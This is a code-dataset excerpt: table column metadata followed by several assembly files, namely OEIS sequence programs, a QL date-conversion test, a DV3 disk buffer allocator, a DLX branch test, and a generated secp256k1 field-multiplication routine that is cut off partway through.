hexsha
stringlengths 40
40
| size
int64 6
1.05M
| ext
stringclasses 3
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
232
| max_stars_repo_name
stringlengths 7
106
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
7
| max_stars_count
int64 1
33.5k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
232
| max_issues_repo_name
stringlengths 7
106
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
7
| max_issues_count
int64 1
37.5k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
232
| max_forks_repo_name
stringlengths 7
106
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
7
| max_forks_count
int64 1
12.6k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
1.05M
| avg_line_length
float64 1.16
19.7k
| max_line_length
int64 2
938k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cd617379d201920bdd7ef7158899ea1d32f960c3
| 407
|
asm
|
Assembly
|
programs/oeis/220/A220660.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/220/A220660.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/220/A220660.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A220660: Irregular table, where the n-th row consists of numbers 0..(n!-1).
; 0,0,1,0,1,2,3,4,5,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66
mov $1,1
lpb $0
add $2,1
mul $1,$2
sub $0,$1
lpe
| 40.7
| 272
| 0.621622
|
a8aef10dae39178666045226d0bc7ef0f3ae00c0
| 2,196
|
asm
|
Assembly
|
smsq/uq/test.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
smsq/uq/test.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
smsq/uq/test.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
; test date conversion long to date/time string QL compatible 1990 Tony Tebby
section test
xref uq_ldate
xref uq_ldowk
xref cv_decil
xref gu_fopen
xref gu_clra
xref gu_flin
xref gu_sstrg
xref gu_nl
xref gu_iowp
xref gu_die
include 'dev8_keys_qlv'
include 'dev8_keys_qdos_ioa'
include 'dev8_keys_qdos_io'
uqt_dchn equ $00
uqt_date equ $04
uqt_buff equ $10
uqt.buff equ $40
uqt_buft equ uqt_buff+uqt.buff
data $400
bra.s start
dc.w 0,0,$4afb
dc.w 9,'Test DATE'
con dc.w 17,'CON_364x102a74x15'
start
lea (a6,a4.l),a5 ; data space
sub.l a6,a6
lea con,a0
moveq #ioa.kexc,d3
jsr gu_fopen ; open console
move.l a0,uqt_dchn(a5) ; and our input channel as well
moveq #7,d1 ; add a border
moveq #1,d2
moveq #iow.defb,d0
jsr gu_iowp
jsr gu_clra ; and clear all
uqt_loop
move.w #uqt.buff,d1 ; buffer length
lea uqt_buff(a5),a1
jsr gu_flin ; fetch line
bne.s uqt_die
cmp.b #'*',(a1)
beq.s uqt_done ; done
move.l a1,a0
add.w d1,a1
move.l a1,d7 ; buffer pointers
jsr cv_decil
move.l d1,uqt_date(a5) ; keep date
move.l uqt_dchn(a5),a0
lea uqt_buft(a5),a1
move.w cv.ilday,a2
jsr (a2)
move.w #' ',(a1)
move.w cv.ildat,a2
jsr (a2)
move.w #25,(a1)
jsr gu_sstrg
jsr gu_nl
trap #15
lea uqt_buft(a5),a1
jsr uq_ldowk
move.w #' ',(a1)
jsr uq_ldate
move.w #25,(a1)
jsr gu_sstrg
jsr gu_nl
bra.s uqt_loop
uqt_done
moveq #0,d0 ; done
uqt_die
jmp gu_die
end
| 23.361702
| 84
| 0.452186
|
37339508dead7114a777148da611e8cb8bc7518e
| 4,242
|
asm
|
Assembly
|
dv3/dv3/albf.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
dv3/dv3/albf.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
dv3/dv3/albf.asm
|
olifink/smsqe
|
c546d882b26566a46d71820d1539bed9ea8af108
|
[
"BSD-2-Clause"
] | null | null | null |
; DV3 Allocate / Locate New Buffer V3.00 1992 Tony Tebby
section dv3
xdef dv3_albf
xdef dv3_lcbf
xref dv3_sbloc
xref dv3_sbnew
include 'dev8_dv3_keys'
include 'dev8_keys_err'
include 'dev8_mac_assert'
;+++
; DV3 allocate or locate a slave block for write operations.
; If necessary, it reads the appropriate sector from the disk or extends the
; file allocation.
;
; d3 r (word) bytes left in buffer
; d4 c p file position
; d5 r file sector
; d6 c p file ID
; d7 c p drive number
; a0 c p channel block
; a2 r pointer to buffer
; a3 c p linkage block
; a4 c p definition block
; a5 c p pointer to map
;
; status return standard
;---
dv3_albf
cmp.l d3c_feof(a0),d4 ; end of file?
blt.s dv3_lcbf ; ... no, locate
move.l d3c_fsect(a0),d5
move.l ddf_smask(a4),d3 ; byte within sector
and.w d4,d3
bne.s dlb_loc1 ; not the start of a new sector
addq.w #1,d5 ; next sector
bcc.s dab_do ; ... current version can only cope
; with sector number up to 65535
move.l d4,d5 ; start of file?
beq.s dab_do
moveq #0,d5
subq.w #1,d5 ; highest sector number
moveq #err.eof,d0
rts
dab_do
dab.reg reg d1/d2/a1
movem.l dab.reg,-(sp)
move.l d5,d3 ; sector number
divu ddf_asect(a4),d3 ; this can deal with group up to 65535
moveq #0,d2
move.w d3,d2
assert d3c_dgroup,d3c_fgroup-4
movem.l d3c_dgroup(a0),d0/d1 ; current drive and file group
cmp.l d3,d2 ; first sector of group?
bne.s dab_loc ; ... no, locate
jsr ddf_salloc(a4) ; allocate new group
bge.s dab_sgrp
bra.s dab_exit
dab_loc
cmp.l d1,d2 ; current group?
beq.s dab_new ; ... yes, just get new slave block
jsr ddf_slocate(a4) ; locate this group
blt.s dab_exit
dab_sgrp
assert d3c_dgroup,d3c_fgroup-4
movem.l d0/d2,d3c_dgroup(a0) ; new current drive and file group
dab_new
move.w d0,d3 ; drive sector / group
lea d3c_csb(a0),a2
jsr dv3_sbnew ; find new slave block
moveq #0,d3
move.w ddf_slen(a4),d3 ; bytes left in buffer
move.l d5,d3c_fsect(a0) ; ***** after this something must be
; put into the sector
moveq #0,d0
dab_exit
movem.l (sp)+,dab.reg
rts
;+++
; DV3 locate a slave block for read operations.
; If necessary, it reads the appropriate sector from the disk or extends the
; file allocation.
;
; d3 r (word) bytes left in buffer
; d4 c p file position
; d5 r file sector
; d6 c p file ID
; d7 c p drive number
; a0 c p channel block
; a2 r pointer to buffer
; a3 c p linkage block
; a4 c p definition block
; a5 c p pointer to map
;
; status return standard
;---
dv3_lcbf
move.l d3c_fsect(a0),d5 ; file sector
move.l ddf_smask(a4),d3 ; byte within sector
and.w d4,d3
bne.s dlb_loc1 ; start of a new sector
addq.l #1,d5 ; next sector !!!!
dlb_loc1
movem.l dab.reg,-(sp)
lea d3c_csb(a0),a2
jsr dv3_sbloc ; locate slave block
beq.s dlb_done
blt.s dlb_exit
tst.b d3c_nnslv(a0) ; create new slave block?
bne.s dlb_nc ; ... no
move.l d5,d3 ; sector number
divu ddf_asect(a4),d3 ; this can deal with group up to 65535
moveq #0,d2
move.w d3,d2
assert d3c_dgroup,d3c_fgroup-4
lea d3c_fgroup(a0),a1
move.l (a1),d1
move.l -(a1),d0 ; current drive and file group
beq.s dlb_loc2 ; none yet
cmp.w d1,d2 ; current group?
beq.s dlb_new ; ... yes, new slave block required
dlb_loc2
jsr ddf_slocate(a4)
blt.s dab_exit
assert d3c_dgroup,d3c_fgroup-4
movem.l d0/d2,d3c_dgroup(a0) ; new current drive and file group
dlb_new
move.w d0,d3 ; drive sector / group
lea d3c_csb(a0),a2
jsr dv3_sbnew ; find new slave block
move.l d3c_feof(a0),d0
sub.l ddf_fhlen(a4),d0 ; position at start of new file?
beq.s dlb_posn ; ... yes
addq.b #sbt.read-sbt.true,sbt_stat(a1) ; read requested
jsr ddl_slbfill(a3) ; read sector
bne.s dlb_exit
dlb_posn
move.l ddf_smask(a4),d3 ; restore byte within sector
and.w d4,d3
dlb_done
move.l d5,d3c_fsect(a0) ; ***** after this something must be
; taken out of or put into the sector:
; beware of iob.test which does not
; move the pointer on
add.w d3,a2 ; pointer position
neg.w d3
add.w ddf_slen(a4),d3 ; bytes left in buffer
moveq #0,d0
dlb_exit
movem.l (sp)+,dab.reg
rts
dlb_nc
moveq #err.nc,d0
bra.s dlb_exit
end
| 23.698324
| 76
| 0.685997
|
cddd807bd3e453628c09ce4ac8f60402e0e92444
| 460
|
asm
|
Assembly
|
DLX_simulation_cfg/sim/test_branch/test_branch.asm
|
florix/DLX
|
fd629818ae72e40849bfa866ee8d23ee82e6f302
|
[
"MIT"
] | null | null | null |
DLX_simulation_cfg/sim/test_branch/test_branch.asm
|
florix/DLX
|
fd629818ae72e40849bfa866ee8d23ee82e6f302
|
[
"MIT"
] | null | null | null |
DLX_simulation_cfg/sim/test_branch/test_branch.asm
|
florix/DLX
|
fd629818ae72e40849bfa866ee8d23ee82e6f302
|
[
"MIT"
] | null | null | null |
; Test branch instructions and with the branch delay slot used
begin:
j real
addi r1, r0, 1 ; unsing delay slot
addi r3, r0, 3 ; these two shouldn't be executed
addi r2, r0, 2
nop ; added just to test the jump instruction
real:
beqz r0, label1
nop ; not using branch delay slot
add r5, r1, r1 ; not executed
addi r6, r0, 6 ; not executed
nop ; added just to test the branch instruction
label1:
benqz r1, begin
nop
nop
nop
nop
nop
nop
nop
nop
nop
| 15.333333
| 62
| 0.717391
|
701babbad323a3450355a98ccc54b2577eeff213
| 433
|
asm
|
Assembly
|
oeis/092/A092094.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/092/A092094.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/092/A092094.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A092094: a(n) = Sum_{i=0,1,2,..; n-k*i >= -n} |n-k*i| for k=3.
; Submitted by Jon Maiga
; 7,12,18,19,27,36,37,48,60,61,75,90,91,108,126,127,147,168,169,192,216,217,243,270,271,300,330,331,363,396,397,432,468,469,507,546,547,588,630,631,675,720,721,768,816,817,867,918,919,972,1026,1027,1083,1140
mov $3,$0
add $0,2
seq $0,68626 ; a(3n) = a(3n-1) = 3*n^2, a(3n-2) = 3*n^2 - 3*n + 1.
mov $2,3
add $2,$0
add $3,1
add $3,$2
mov $0,$3
| 33.307692
| 207
| 0.6097
|
7ca6006ca73d22b2451b23d5b6f1d799b8860016
| 240
|
asm
|
Assembly
|
programs/oeis/033/A033358.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | 1
|
2021-03-15T11:38:20.000Z
|
2021-03-15T11:38:20.000Z
|
programs/oeis/033/A033358.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
programs/oeis/033/A033358.asm
|
karttu/loda
|
9c3b0fc57b810302220c044a9d17db733c76a598
|
[
"Apache-2.0"
] | null | null | null |
; A033358: [ 38/n ].
; 38,19,12,9,7,6,5,4,4,3,3,3,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
add $0,1
mov $1,38
div $1,$0
| 34.285714
| 188
| 0.504167
|
232485622e5a6c0c88a0164da365da010d0c9398
| 690
|
asm
|
Assembly
|
procedureGeneriche/lettura da file e calcolo della lunghezza.asm
|
Scodellz/ProgettoArchitetture-1819
|
f2ac164288884ad9c32819b988a8c8690d6ee180
|
[
"MIT"
] | null | null | null |
procedureGeneriche/lettura da file e calcolo della lunghezza.asm
|
Scodellz/ProgettoArchitetture-1819
|
f2ac164288884ad9c32819b988a8c8690d6ee180
|
[
"MIT"
] | null | null | null |
procedureGeneriche/lettura da file e calcolo della lunghezza.asm
|
Scodellz/ProgettoArchitetture-1819
|
f2ac164288884ad9c32819b988a8c8690d6ee180
|
[
"MIT"
] | null | null | null |
.data
buffer: .space 255
inputfile: .asciiz ".marSETUP/messaggio.txt"
cripted: .asciiz " cripted content:"
.align 2
.text
main:
open: li $v0, 13 # apri il file
la $a0, inputfile
li $a1, 0
li $a2, 0
syscall
move $t0, $v0 # slaviamo il percorso del file
read: li $v0, 14 # si legge e sia carica il contenuto del file
move $a0, $t0
la $a1, buffer
li $a2, 255
syscall
move $a3, $a1 # salviamo il percorso del baffer con gli elementi da convertire
findLen: lbu $t0, ($a3) # troviamo la lunghezza della stringa nel buffer
beq $t0, 10 , STAMPA
addi $t1, $t1, 1 # RITORNERA LA LUNGHEZZA DELLA STRING IN $T1
addi $a3, $a3, 1
j findLen
| 18.648649
| 80
| 0.642029
|
9680eb80fa79d302736afcd0a74ee68c424faef8
| 14,302
|
asm
|
Assembly
|
fiat-amd64/53.02_ratio11450_seed2312492709004220_mul_secp256k1.asm
|
dderjoel/fiat-crypto
|
57a9612577d766a0ae83169ea9517bfa7f01ea4e
|
[
"BSD-1-Clause",
"Apache-2.0",
"MIT-0",
"MIT"
] | 491
|
2015-11-25T23:44:39.000Z
|
2022-03-29T17:31:21.000Z
|
fiat-amd64/53.02_ratio11450_seed2312492709004220_mul_secp256k1.asm
|
dderjoel/fiat-crypto
|
57a9612577d766a0ae83169ea9517bfa7f01ea4e
|
[
"BSD-1-Clause",
"Apache-2.0",
"MIT-0",
"MIT"
] | 755
|
2016-02-02T14:03:05.000Z
|
2022-03-31T16:47:23.000Z
|
fiat-amd64/53.02_ratio11450_seed2312492709004220_mul_secp256k1.asm
|
dderjoel/fiat-crypto
|
57a9612577d766a0ae83169ea9517bfa7f01ea4e
|
[
"BSD-1-Clause",
"Apache-2.0",
"MIT-0",
"MIT"
] | 117
|
2015-10-25T16:28:15.000Z
|
2022-02-08T23:01:09.000Z
|
SECTION .text
GLOBAL mul_secp256k1
mul_secp256k1:
sub rsp, 0x110 ; last 0x30 (6) for Caller - save regs
mov [ rsp + 0xe0 ], rbx; saving to stack
mov [ rsp + 0xe8 ], rbp; saving to stack
mov [ rsp + 0xf0 ], r12; saving to stack
mov [ rsp + 0xf8 ], r13; saving to stack
mov [ rsp + 0x100 ], r14; saving to stack
mov [ rsp + 0x108 ], r15; saving to stack
mov rax, [ rsi + 0x0 ]; load m64 x4 to register64
mov r10, [ rsi + 0x8 ]; load m64 x1 to register64
mov r11, rdx; preserving value of arg2 into a new reg
mov rdx, [ rdx + 0x0 ]; saving arg2[0] in rdx.
mulx rbx, rbp, rax; x12, x11<- x4 * arg2[0]
mov r12, 0xd838091dd2253531 ; moving imm to reg
mov rdx, r12; 0xd838091dd2253531 to rdx
mulx r12, r13, rbp; _, x20<- x11 * 0xd838091dd2253531
mov r12, rdx; preserving value of 0xd838091dd2253531 into a new reg
mov rdx, [ r11 + 0x8 ]; saving arg2[1] in rdx.
mulx r14, r15, rax; x10, x9<- x4 * arg2[1]
mov rcx, 0xffffffffffffffff ; moving imm to reg
mov rdx, r13; x20 to rdx
mulx r13, r8, rcx; x27, x26<- x20 * 0xffffffffffffffff
xor r9, r9
adox r15, rbx
mov rbx, 0xfffffffefffffc2f ; moving imm to reg
mulx r9, rcx, rbx; x29, x28<- x20 * 0xfffffffefffffc2f
adcx r8, r9
seto r9b; spill OF x14 to reg (r9)
mov r12, -0x2 ; moving imm to reg
inc r12; OF<-0x0, preserve CF (debug: 6; load -2, increase it, save as -1)
adox rcx, rbp
mov rcx, rdx; preserving value of x20 into a new reg
mov rdx, [ r11 + 0x0 ]; saving arg2[0] in rdx.
mulx rbp, r12, r10; x54, x53<- x1 * arg2[0]
adox r8, r15
setc r15b; spill CF x31 to reg (r15)
clc;
adcx r12, r8
mov r8, 0xd838091dd2253531 ; moving imm to reg
mov rdx, r8; 0xd838091dd2253531 to rdx
mulx r8, rbx, r12; _, x72<- x62 * 0xd838091dd2253531
mov r8, 0xfffffffefffffc2f ; moving imm to reg
xchg rdx, r8; 0xfffffffefffffc2f, swapping with 0xd838091dd2253531, which is currently in rdx
mov [ rsp + 0x0 ], rdi; spilling out1 to mem
mulx r8, rdi, rbx; x81, x80<- x72 * 0xfffffffefffffc2f
mov rdx, 0xffffffffffffffff ; moving imm to reg
mov [ rsp + 0x8 ], r14; spilling x10 to mem
mov byte [ rsp + 0x10 ], r9b; spilling byte x14 to mem
mulx r14, r9, rbx; x77, x76<- x72 * 0xffffffffffffffff
mov [ rsp + 0x18 ], rax; spilling x4 to mem
mov [ rsp + 0x20 ], rdi; spilling x80 to mem
mulx rax, rdi, rbx; x79, x78<- x72 * 0xffffffffffffffff
mov [ rsp + 0x28 ], r13; spilling x27 to mem
mulx rbx, r13, rbx; x75, x74<- x72 * 0xffffffffffffffff
setc dl; spill CF x63 to reg (rdx)
clc;
adcx rdi, r8
adcx r9, rax
adcx r13, r14
mov r8, 0x0 ; moving imm to reg
adcx rbx, r8
xchg rdx, r10; x1, swapping with x63, which is currently in rdx
mulx r14, rax, [ r11 + 0x8 ]; x52, x51<- x1 * arg2[1]
mov r8, [ rsi + 0x10 ]; load m64 x2 to register64
clc;
adcx rax, rbp
mov [ rsp + 0x30 ], rbx; spilling x88 to mem
mulx rbp, rbx, [ r11 + 0x10 ]; x50, x49<- x1 * arg2[2]
adcx rbx, r14
mulx rdx, r14, [ r11 + 0x18 ]; x48, x47<- x1 * arg2[3]
adcx r14, rbp
mov rbp, rdx; preserving value of x48 into a new reg
mov rdx, [ r11 + 0x8 ]; saving arg2[1] in rdx.
mov [ rsp + 0x38 ], r13; spilling x86 to mem
mov [ rsp + 0x40 ], r9; spilling x84 to mem
mulx r13, r9, r8; x105, x104<- x2 * arg2[1]
mov rdx, r8; x2 to rdx
mov [ rsp + 0x48 ], r14; spilling x59 to mem
mulx r8, r14, [ r11 + 0x18 ]; x101, x100<- x2 * arg2[3]
mov [ rsp + 0x50 ], rbx; spilling x57 to mem
mov rbx, 0x0 ; moving imm to reg
adcx rbp, rbx
mov [ rsp + 0x58 ], rbp; spilling x61 to mem
mulx rbx, rbp, [ r11 + 0x0 ]; x107, x106<- x2 * arg2[0]
clc;
adcx r9, rbx
mulx rdx, rbx, [ r11 + 0x10 ]; x103, x102<- x2 * arg2[2]
adcx rbx, r13
adcx r14, rdx
mov r13, 0x0 ; moving imm to reg
adcx r8, r13
mov rdx, 0xffffffffffffffff ; moving imm to reg
mov [ rsp + 0x60 ], r8; spilling x114 to mem
mulx r13, r8, rcx; x25, x24<- x20 * 0xffffffffffffffff
mov [ rsp + 0x68 ], r14; spilling x112 to mem
mulx rcx, r14, rcx; x23, x22<- x20 * 0xffffffffffffffff
clc;
mov rdx, -0x1 ; moving imm to reg
movzx r15, r15b
adcx r15, rdx; loading flag
adcx r8, [ rsp + 0x28 ]
adcx r14, r13
setc r15b; spill CF x35 to reg (r15)
clc;
adcx r12, [ rsp + 0x20 ]
mov rdx, [ r11 + 0x10 ]; arg2[2] to rdx
mulx r12, r13, [ rsp + 0x18 ]; x8, x7<- x4 * arg2[2]
mov [ rsp + 0x70 ], rbx; spilling x110 to mem
setc bl; spill CF x90 to reg (rbx)
mov [ rsp + 0x78 ], r9; spilling x108 to mem
movzx r9, byte [ rsp + 0x10 ]; load byte memx14 to register64
clc;
mov [ rsp + 0x80 ], r14; spilling x34 to mem
mov r14, -0x1 ; moving imm to reg
adcx r9, r14; loading flag
adcx r13, [ rsp + 0x8 ]
adox r8, r13
seto r9b; spill OF x42 to reg (r9)
inc r14; OF<-0x0, preserve CF (debug: state 2 (y: -1, n: 0))
mov r13, -0x1 ; moving imm to reg
movzx r10, r10b
adox r10, r13; loading flag
adox r8, rax
seto r10b; spill OF x65 to reg (r10)
dec r14; OF<-0x0, preserve CF (debug: state 1(0x0) (thanks Paul))
movzx rbx, bl
adox rbx, r14; loading flag
adox r8, rdi
seto r13b; spill OF x92 to reg (r13)
inc r14; OF<-0x0, preserve CF (debug: state 2 (y: -1, n: 0))
adox rbp, r8
mov rdi, 0xd838091dd2253531 ; moving imm to reg
mov rdx, rbp; x115 to rdx
mulx rbp, rax, rdi; _, x125<- x115 * 0xd838091dd2253531
mov rbp, 0xffffffffffffffff ; moving imm to reg
xchg rdx, rax; x125, swapping with x115, which is currently in rdx
mulx rbx, r8, rbp; x132, x131<- x125 * 0xffffffffffffffff
movzx r14, r15b; x36, copying x35 here, cause x35 is needed in a reg for other than x36, namely all: , x36, size: 1
lea r14, [ r14 + rcx ]
mov rcx, 0xfffffffefffffc2f ; moving imm to reg
mulx r15, rdi, rcx; x134, x133<- x125 * 0xfffffffefffffc2f
mov [ rsp + 0x88 ], rdi; spilling x133 to mem
mulx rcx, rdi, rbp; x128, x127<- x125 * 0xffffffffffffffff
seto bpl; spill OF x116 to reg (rbp)
mov byte [ rsp + 0x90 ], r13b; spilling byte x92 to mem
mov r13, -0x2 ; moving imm to reg
inc r13; OF<-0x0, preserve CF (debug: 6; load -2, increase it, save as -1)
adox r8, r15
mov r15, 0xffffffffffffffff ; moving imm to reg
mulx rdx, r13, r15; x130, x129<- x125 * 0xffffffffffffffff
adox r13, rbx
adox rdi, rdx
mov rdx, [ rsp + 0x18 ]; x4 to rdx
mulx rdx, rbx, [ r11 + 0x18 ]; x6, x5<- x4 * arg2[3]
adcx rbx, r12
mov r12, 0x0 ; moving imm to reg
adcx rdx, r12
adox rcx, r12
add r9b, 0xFF; load flag from rm/8 into CF, clears other flag. NODE, if operand1 is not a byte reg, this fails.
setc r9b; since that has deps, resore it whereever it was
adcx rbx, [ rsp + 0x80 ]
mov r9, -0x1 ; moving imm to reg
movzx r10, r10b
adox r10, r9; loading flag
adox rbx, [ rsp + 0x50 ]
adcx r14, rdx
mov r10, [ rsi + 0x18 ]; load m64 x3 to register64
mov rdx, [ rsp + 0x48 ]; x68, copying x59 here, cause x59 is needed in a reg for other than x68, namely all: , x68--x69, size: 1
adox rdx, r14
setc r14b; spill CF x70 to reg (r14)
movzx r14, r14b; spilling a flag to reg cause it has deps
adox r14, [ rsp + 0x58 ]; OF should have been spilled if it had deps, CF should have been spilled into r14 and into another reg, if it has had other deps than this one.
movzx r12, byte [ rsp + 0x90 ]; load byte memx92 to register64
clc;
adcx r12, r9; loading flag
adcx rbx, [ rsp + 0x40 ]
mov r12, [ rsp + 0x38 ]; x95, copying x86 here, cause x86 is needed in a reg for other than x95, namely all: , x95--x96, size: 1
adcx r12, rdx
mov rdx, [ r11 + 0x0 ]; arg2[0] to rdx
mulx r9, r15, r10; x160, x159<- x3 * arg2[0]
mov [ rsp + 0x98 ], rcx; spilling x141 to mem
mov rcx, [ rsp + 0x30 ]; x97, copying x88 here, cause x88 is needed in a reg for other than x97, namely all: , x97--x98, size: 1
adcx rcx, r14
seto r14b; spill OF x99 to reg (r14)
adc r14b, 0x0
movzx r14, r14b
add bpl, 0x7F; load flag from rm/8 into OF, clears other flag. NODE, if operand1 is not a byte reg, this fails.
seto bpl; since that has deps, resore it whereever it was
adox rbx, [ rsp + 0x78 ]
mov rbp, [ rsp + 0x70 ]; x119, copying x110 here, cause x110 is needed in a reg for other than x119, namely all: , x119--x120, size: 1
adox rbp, r12
mov rdx, [ r11 + 0x8 ]; arg2[1] to rdx
mov byte [ rsp + 0xa0 ], r14b; spilling byte x99 to mem
mulx r12, r14, r10; x158, x157<- x3 * arg2[1]
adcx rax, [ rsp + 0x88 ]
adcx r8, rbx
adcx r13, rbp
setc al; spill CF x147 to reg (rax)
clc;
adcx r14, r9
setc r9b; spill CF x162 to reg (r9)
clc;
adcx r15, r8
adcx r14, r13
mov rbx, 0xd838091dd2253531 ; moving imm to reg
mov rdx, rbx; 0xd838091dd2253531 to rdx
mulx rbx, rbp, r15; _, x178<- x168 * 0xd838091dd2253531
mov rbx, 0xfffffffefffffc2f ; moving imm to reg
xchg rdx, rbp; x178, swapping with 0xd838091dd2253531, which is currently in rdx
mulx r8, r13, rbx; x187, x186<- x178 * 0xfffffffefffffc2f
setc bl; spill CF x171 to reg (rbx)
clc;
adcx r13, r15
mov r13, 0xffffffffffffffff ; moving imm to reg
mulx r15, rbp, r13; x185, x184<- x178 * 0xffffffffffffffff
mov r13, [ rsp + 0x68 ]; x121, copying x112 here, cause x112 is needed in a reg for other than x121, namely all: , x121--x122, size: 1
adox r13, rcx
seto cl; spill OF x122 to reg (rcx)
mov [ rsp + 0xa8 ], r15; spilling x185 to mem
mov r15, 0x0 ; moving imm to reg
dec r15; OF<-0x0, preserve CF (debug: state 4 (thanks Paul))
movzx rax, al
adox rax, r15; loading flag
adox r13, rdi
seto dil; spill OF x149 to reg (rdi)
inc r15; OF<-0x0, preserve CF (debug: state 2 (y: -1, n: 0))
adox rbp, r8
adcx rbp, r14
setc al; spill CF x198 to reg (rax)
seto r14b; spill OF x189 to reg (r14)
mov r8, rbp; x206, copying x197 here, cause x197 is needed in a reg for other than x206, namely all: , x206--x207, x216, size: 2
mov byte [ rsp + 0xb0 ], dil; spilling byte x149 to mem
mov rdi, 0xfffffffefffffc2f ; moving imm to reg
sub r8, rdi
mov r15, rdx; preserving value of x178 into a new reg
mov rdx, [ r11 + 0x10 ]; saving arg2[2] in rdx.
mov [ rsp + 0xb8 ], r8; spilling x206 to mem
mulx rdi, r8, r10; x156, x155<- x3 * arg2[2]
mov [ rsp + 0xc0 ], rdi; spilling x156 to mem
mov rdi, -0x1 ; moving imm to reg
inc rdi; OF<-0x0, preserve CF (debug: state 5 (thanks Paul))
mov rdi, -0x1 ; moving imm to reg
movzx r9, r9b
adox r9, rdi; loading flag
adox r12, r8
setc r9b; spill CF x207 to reg (r9)
clc;
movzx rbx, bl
adcx rbx, rdi; loading flag
adcx r13, r12
mov rbx, 0xffffffffffffffff ; moving imm to reg
mov rdx, rbx; 0xffffffffffffffff to rdx
mulx rbx, r8, r15; x183, x182<- x178 * 0xffffffffffffffff
setc r12b; spill CF x173 to reg (r12)
clc;
movzx r14, r14b
adcx r14, rdi; loading flag
adcx r8, [ rsp + 0xa8 ]
setc r14b; spill CF x191 to reg (r14)
clc;
movzx rax, al
adcx rax, rdi; loading flag
adcx r13, r8
movzx rax, byte [ rsp + 0xa0 ]; load byte memx99 to register64
setc r8b; spill CF x200 to reg (r8)
clc;
movzx rcx, cl
adcx rcx, rdi; loading flag
adcx rax, [ rsp + 0x60 ]
mov rcx, rdx; preserving value of 0xffffffffffffffff into a new reg
mov rdx, [ r11 + 0x18 ]; saving arg2[3] in rdx.
mulx r10, rdi, r10; x154, x153<- x3 * arg2[3]
mov byte [ rsp + 0xc8 ], r8b; spilling byte x200 to mem
setc r8b; spill CF x124 to reg (r8)
mov [ rsp + 0xd0 ], rbx; spilling x183 to mem
seto bl; spill OF x164 to reg (rbx)
mov byte [ rsp + 0xd8 ], r14b; spilling byte x191 to mem
movzx r14, r9b; x207, copying x207 here, cause x207 is needed in a reg for other than x207, namely all: , x208--x209, size: 1
add r14, -0x1
mov r14, r13; x208, copying x199 here, cause x199 is needed in a reg for other than x208, namely all: , x208--x209, x217, size: 2
sbb r14, rcx
mov r9, 0x0 ; moving imm to reg
dec r9; OF<-0x0, preserve CF (debug: state 4 (thanks Paul))
movzx rbx, bl
adox rbx, r9; loading flag
adox rdi, [ rsp + 0xc0 ]
setc bl; spill CF x209 to reg (rbx)
movzx r9, byte [ rsp + 0xb0 ]; load byte memx149 to register64
clc;
mov rcx, -0x1 ; moving imm to reg
adcx r9, rcx; loading flag
adcx rax, [ rsp + 0x98 ]
movzx r9, r8b; x152, copying x124 here, cause x124 is needed in a reg for other than x152, namely all: , x152, size: 1
mov rcx, 0x0 ; moving imm to reg
adcx r9, rcx
mov r8, 0xffffffffffffffff ; moving imm to reg
